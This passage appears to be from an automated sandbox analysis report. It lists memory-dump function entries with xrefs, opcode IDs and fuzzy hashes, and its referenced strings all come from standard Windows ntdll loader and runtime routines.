                                                                  • String ID: @Sx7$RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  • @, xrefs: 3783B2F0
                                                                  • GlobalFlag, xrefs: 3783B30F
                                                                  • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 3783B2B2
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                                  • API String ID: 0-4192008846
                                                                  • Opcode ID: 332656c718a5a75165121969b28ff806ae8eaa996baad638aea0f850e052d4b3
                                                                  • Instruction ID: a24cb864bfe959d520bfde5c323f0c4666d0dc2e83165a4e3723f61a5059d07a
                                                                  • Opcode Fuzzy Hash: 332656c718a5a75165121969b28ff806ae8eaa996baad638aea0f850e052d4b3
                                                                  • Instruction Fuzzy Hash: 29314FB5D01219AEEB10EF98DC85BEEBBBCEF54754F400469E601AB240D779AA04CB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  • DLL "%wZ" has TLS information at %p, xrefs: 3782184A
                                                                  • minkernel\ntdll\ldrtls.c, xrefs: 3782185B
                                                                  • LdrpInitializeTls, xrefs: 37821851
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                  • API String ID: 0-931879808
                                                                  • Opcode ID: ddb0f4c4ae25679f228861c023602b49de88120999199a2c4d78ea6dcbad9ebb
                                                                  • Instruction ID: 7443d14759102614dc2a4d6a14e24a51effd2e92e3c45abfe39a6a483fcdb667
                                                                  • Opcode Fuzzy Hash: ddb0f4c4ae25679f228861c023602b49de88120999199a2c4d78ea6dcbad9ebb
                                                                  • Instruction Fuzzy Hash: 8A31E771B41300FBE7108B58C88BF6AB7BDAB54364F110439E501BF980DB74AD8587A1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 378385DE
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                  • API String ID: 0-702105204
                                                                  • Opcode ID: 762d2e2f6be98ad10bbfe9d24bc1102f01eefaca8bf3589f88301a8d9be94286
                                                                  • Instruction ID: 5c3b3aaa6f3d520933c6be267de675ad091fb63d2b2faea9182540ecab989f01
                                                                  • Opcode Fuzzy Hash: 762d2e2f6be98ad10bbfe9d24bc1102f01eefaca8bf3589f88301a8d9be94286
                                                                  • Instruction Fuzzy Hash: 0E01427D2032049FF7604E5CD88CBAA3B75EF612A0F400C68E0015A152DB28B882EAF6
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID:
                                                                  • API String ID: 3446177414-0
                                                                  • Opcode ID: 1d0eb0a16bf463915aeab57ae6f6ad855b9dd98b15fc72b170495c6d198f782a
                                                                  • Instruction ID: 4006351fe9e46cc754e2a1cca7d912489ad9f6e5af23e3d26fea457225ad0eca
                                                                  • Opcode Fuzzy Hash: 1d0eb0a16bf463915aeab57ae6f6ad855b9dd98b15fc72b170495c6d198f782a
                                                                  • Instruction Fuzzy Hash: DB319035201B06AFEB659F65C984B9AFB66BF58BA8F004115E9048BA50DB74E821CBC1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID: Legacy$UEFI
                                                                  • API String ID: 2994545307-634100481
                                                                  • Opcode ID: 6ccecbc76438b1564f3a3ed119af59d58a27ca303ea5f7daa5e4c7fb7da9750f
                                                                  • Instruction ID: f8e4fa8b90983b4a64ebd313e38b7c1065bf749be864fbd5abfb1f1b791270ec
                                                                  • Opcode Fuzzy Hash: 6ccecbc76438b1564f3a3ed119af59d58a27ca303ea5f7daa5e4c7fb7da9750f
                                                                  • Instruction Fuzzy Hash: A6616AB1A107089FEB14CFA8C944BADB7B8FF58751F54402EE549EB241EB31E980DB54
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  • RedirectedKey, xrefs: 3788B60E
                                                                  • \Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 3788B5C4
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
                                                                  • API String ID: 0-1388552009
                                                                  • Opcode ID: 59bb6c5b3f3c215fd4ed5035d89be567fa28b8d4bc022c4b115812d43c47cc9e
                                                                  • Instruction ID: 5b2c1130d4fad2ad789f560f3348baf8efbf37a1ee14f553850a6cbdcc07ed4d
                                                                  • Opcode Fuzzy Hash: 59bb6c5b3f3c215fd4ed5035d89be567fa28b8d4bc022c4b115812d43c47cc9e
                                                                  • Instruction Fuzzy Hash: 7361E3B5D01219EBDF11DFD8C889ADEBFB8FB58710F50406AE415A7200D7349A45CFA1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: $$$
                                                                  • API String ID: 3446177414-233714265
                                                                  • Opcode ID: 16aa9c863ed71859f045312601ca4240d36425f3875d9d022fc9febe887fea33
                                                                  • Instruction ID: cf4b4a226df5aafba0208b7fb5ffc1d22269bcac23fdd7b0fc33702b79183203
                                                                  • Opcode Fuzzy Hash: 16aa9c863ed71859f045312601ca4240d36425f3875d9d022fc9febe887fea33
                                                                  • Instruction Fuzzy Hash: 8861F176A0174ACFEB20CFA4C684BADB7F2FF08714F504469E1056F644CB78A982CB81
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: z7$ z7
                                                                  • API String ID: 0-2832549702
                                                                  • Opcode ID: cacd762708bd6a605bcb6c229ee5d23b2bd2d13463ee229196d18e4f5d2f2964
                                                                  • Instruction ID: 2dcfa9c323e1553918b436720eecaed4d4243ed12ce143b62691d91050b71f41
                                                                  • Opcode Fuzzy Hash: cacd762708bd6a605bcb6c229ee5d23b2bd2d13463ee229196d18e4f5d2f2964
                                                                  • Instruction Fuzzy Hash: 3C31B636608709ABDF21DE248894E7BB7A6EF946A0F014529FC159F310EB34DC15CFA2
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 3782289F
                                                                  • RtlpInitializeAssemblyStorageMap, xrefs: 3782289A
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                                  • API String ID: 0-2653619699
                                                                  • Opcode ID: bffdbd336480e8767aab540f73c3506da6f20b7703c6bb43ba9ad2ce208bd636
                                                                  • Instruction ID: dd22856891b8f559e8db86bd45b081720661648d66e8c059f88833fa7b38c9bf
                                                                  • Opcode Fuzzy Hash: bffdbd336480e8767aab540f73c3506da6f20b7703c6bb43ba9ad2ce208bd636
                                                                  • Instruction Fuzzy Hash: F0113272B00308AFE7158E488C40FAA36ACDB89760F618029B900EF244DA74DD0097A1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID: Cleanup Group$Threadpool!
                                                                  • API String ID: 2994545307-4008356553
                                                                  • Opcode ID: 0d34474cf8d79cbd74d2968ef2fa152e57366ae277e3d617138963bf98f8944b
                                                                  • Instruction ID: 0d97bd82de8dbc691cbc84d5418e95de77f45e20bc2df57a30367b582798d438
                                                                  • Opcode Fuzzy Hash: 0d34474cf8d79cbd74d2968ef2fa152e57366ae277e3d617138963bf98f8944b
                                                                  • Instruction Fuzzy Hash: 6801D1B2250700AFE311CF24CE4AB2677F8EB80715F01897AE558CB990E738E904CB46
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: MUI
                                                                  • API String ID: 0-1339004836
                                                                  • Opcode ID: 7a7c3d5449f17dc01c14b5bb7c1406163d02e562707fd523fb05375ead719f1c
                                                                  • Instruction ID: c7567aa21907b9a3adf02be88323dccd3389da1f256091bdae31c7e0d23c7d91
                                                                  • Opcode Fuzzy Hash: 7a7c3d5449f17dc01c14b5bb7c1406163d02e562707fd523fb05375ead719f1c
                                                                  • Instruction Fuzzy Hash: 34823A79E003189FEF24CFA9C8807EDB7B6BF48360F508569E859AF251DB34A945CB50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9292efda504e00707e110859d8585f0cc8c3cd28a3fd6e405ff39348d3c150ff
                                                                  • Instruction ID: a2cfc533795e1275de8675f724823ba49c0f01f18e289ddd149d5ec8f5d3c222
                                                                  • Opcode Fuzzy Hash: 9292efda504e00707e110859d8585f0cc8c3cd28a3fd6e405ff39348d3c150ff
                                                                  • Instruction Fuzzy Hash: 11E16B75608341CFDB24CF28C490B5ABBE1BF88358F05896DE695CB351DB31E906CB92
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ef0003fc1708157b2151eaff6bf1e0df44df146d223c08cd6fbb1fa69813f273
                                                                  • Instruction ID: 659d24e665e105bd2b5a34bf2e69f61d3dffdbe40055b1854bcfe110fc68e81c
                                                                  • Opcode Fuzzy Hash: ef0003fc1708157b2151eaff6bf1e0df44df146d223c08cd6fbb1fa69813f273
                                                                  • Instruction Fuzzy Hash: 10A10675E12314EFEB12CFA4C848BAE7BB5AB04768F050125E911BF291D7B8AD40CBD1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 32f8fcee5008393dd4bbc413e26adefeab7e5a212dca397d953f5a41085deb74
                                                                  • Instruction ID: 9e59ba6755d1e1946c14d0b6a530f1a55ce7f3d0237b21601d092d1b136a3d97
                                                                  • Opcode Fuzzy Hash: 32f8fcee5008393dd4bbc413e26adefeab7e5a212dca397d953f5a41085deb74
                                                                  • Instruction Fuzzy Hash: F1B13A75A01206DFDB18CF68C480AA9FBB6BF88354F2585AED4199F351DB34A941CBD0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID:
                                                                  • API String ID: 3446177414-0
                                                                  • Opcode ID: 347d03aa82219ba265dfbbc1445c8cb457fbaefb5b50ef66fb4a7872f9202680
                                                                  • Instruction ID: 4524abf645091681cd82db16dc4facac756f72fc047b25526a0a6f034406dd5e
                                                                  • Opcode Fuzzy Hash: 347d03aa82219ba265dfbbc1445c8cb457fbaefb5b50ef66fb4a7872f9202680
                                                                  • Instruction Fuzzy Hash: CA41F3B5602704DFDB21DF24C944B59B7F2FF58368F108A9AC0169F6A0DB34A941CF82
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID:
                                                                  • API String ID: 3446177414-0
                                                                  • Opcode ID: 6390547cc1572c6a8801dc70d8f778e3d2806f24aaaa3c9d3e48e49b5f6e0095
                                                                  • Instruction ID: f2ffea2833b3bde0051f227cce9e233460a845732073810dd01fcdd7854c2e37
                                                                  • Opcode Fuzzy Hash: 6390547cc1572c6a8801dc70d8f778e3d2806f24aaaa3c9d3e48e49b5f6e0095
                                                                  • Instruction Fuzzy Hash: EB41C2756043419FDB25CF28D894B2ABBEAFF853A0F10483DE5458F2A1DB34E845CB92
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID:
                                                                  • API String ID: 3446177414-0
                                                                  • Opcode ID: 79587476a169fcd5c9685fc4d0bb148336d64b4e33a7ecb4f40abee940fed5f6
                                                                  • Instruction ID: 0cb9883509d3dfeebeb912a5373eabfbdf632df87e81142134bddb50ecdd9be2
                                                                  • Opcode Fuzzy Hash: 79587476a169fcd5c9685fc4d0bb148336d64b4e33a7ecb4f40abee940fed5f6
                                                                  • Instruction Fuzzy Hash: FD312172650204AFE751CF24C888A6A7BA5EF49360F104669ED049F3A1DB35ED42CFD1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID:
                                                                  • API String ID: 3446177414-0
                                                                  • Opcode ID: 6fcb27d5c25c462c8559daa383c1694a98114b785d94e853975932470da4e8f4
                                                                  • Instruction ID: fe60f57487e3867287ba049490db1f3177d4a50d0762d1657d39576c034b973f
                                                                  • Opcode Fuzzy Hash: 6fcb27d5c25c462c8559daa383c1694a98114b785d94e853975932470da4e8f4
                                                                  • Instruction Fuzzy Hash: D4317C35715A05FFEB558F65CE84BA9BBA6FF88390F405055E8008BA50DB35E931CB81
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID:
                                                                  • API String ID: 3446177414-0
                                                                  • Opcode ID: a99ad449c06762c09007f1cc344041e9293de3abd5df207284796a68ebf072b5
                                                                  • Instruction ID: 8b9e43ec9804c02d49a2449dc4668cbf518bf0468db43d7d5df1096a45419aa6
                                                                  • Opcode Fuzzy Hash: a99ad449c06762c09007f1cc344041e9293de3abd5df207284796a68ebf072b5
                                                                  • Instruction Fuzzy Hash: BE3178B55093429FC700CF18C84894ABBE1FF9A368F0485AEE4889F211D731EE05CB96
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID:
                                                                  • API String ID: 3446177414-0
                                                                  • Opcode ID: 05c2d9ed6439ccc161b975dac42bb20162f07d27e36aa8a727eefa9eea799f1e
                                                                  • Instruction ID: 7409d5ad787f2d1e341c2e4cb231be76e5700243c306c3cf9053a45cfdeef185
                                                                  • Opcode Fuzzy Hash: 05c2d9ed6439ccc161b975dac42bb20162f07d27e36aa8a727eefa9eea799f1e
                                                                  • Instruction Fuzzy Hash: 5521F0352056049FDB71DF14C984F1ABBA2EF89B28F420959E8410F790CBB4ED89CB92
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID:
                                                                  • API String ID: 3446177414-0
                                                                  • Opcode ID: 7f19187c4cf11e3942b306f39fcd65e19fa8e322f8ae7775ce363368cf9890de
                                                                  • Instruction ID: 07ba3bda3c568b4c522ed6f5bd32ec9db882a55c4ddbc9bffc3b3234fa6354a3
                                                                  • Opcode Fuzzy Hash: 7f19187c4cf11e3942b306f39fcd65e19fa8e322f8ae7775ce363368cf9890de
                                                                  • Instruction Fuzzy Hash: 90F0FA32200600ABE331CB08CC08F9ABBFEEF84B10F040619E54697290DBA4F90ACA60
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: GlobalTags
                                                                  • API String ID: 0-1106856819
                                                                  • Opcode ID: 0bf6b4ce0fe17087f3db9eaa11984675b17ae94cc21803cf23aff7edf6d288fb
                                                                  • Instruction ID: 84c213fd951c4aff792379652a2c51b325347a00162553fd2dd4527286e3880c
                                                                  • Opcode Fuzzy Hash: 0bf6b4ce0fe17087f3db9eaa11984675b17ae94cc21803cf23aff7edf6d288fb
                                                                  • Instruction Fuzzy Hash: A0716EB5F0030A9FEB14CF98D5807ADBBB1BF68361F10812AE805AB644EB359981DB54
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @
                                                                  • API String ID: 0-2766056989
                                                                  • Opcode ID: cf001e69a80641a8cc3ed551a73227fc2f86a0353987b9bba849c8e96c1f93c2
                                                                  • Instruction ID: 1e9dfe1fccb2138a15a813e43e4edaaf16c347135d0c0ea228257c4b12e620dd
                                                                  • Opcode Fuzzy Hash: cf001e69a80641a8cc3ed551a73227fc2f86a0353987b9bba849c8e96c1f93c2
                                                                  • Instruction Fuzzy Hash: 2C614AB5D01219EBDF21CFA5C844BEEBBF9EF44764F104159E820AB290DB759A01CFA1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: #%u
                                                                  • API String ID: 0-232158463
                                                                  • Opcode ID: 385d393f6c01be365b3b4aeda52eb3dbbf8fddf8262c21312ae2aa6c0ba505cb
                                                                  • Instruction ID: 98c21978a5173271b32476bec287b680bc6f167d4b0cebe0471d0af92d075e26
                                                                  • Opcode Fuzzy Hash: 385d393f6c01be365b3b4aeda52eb3dbbf8fddf8262c21312ae2aa6c0ba505cb
                                                                  • Instruction Fuzzy Hash: A0712D71A0024ADFDB05CFA8D984FAEB7F8EF18754F144065E905EB251EB38E941CBA1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
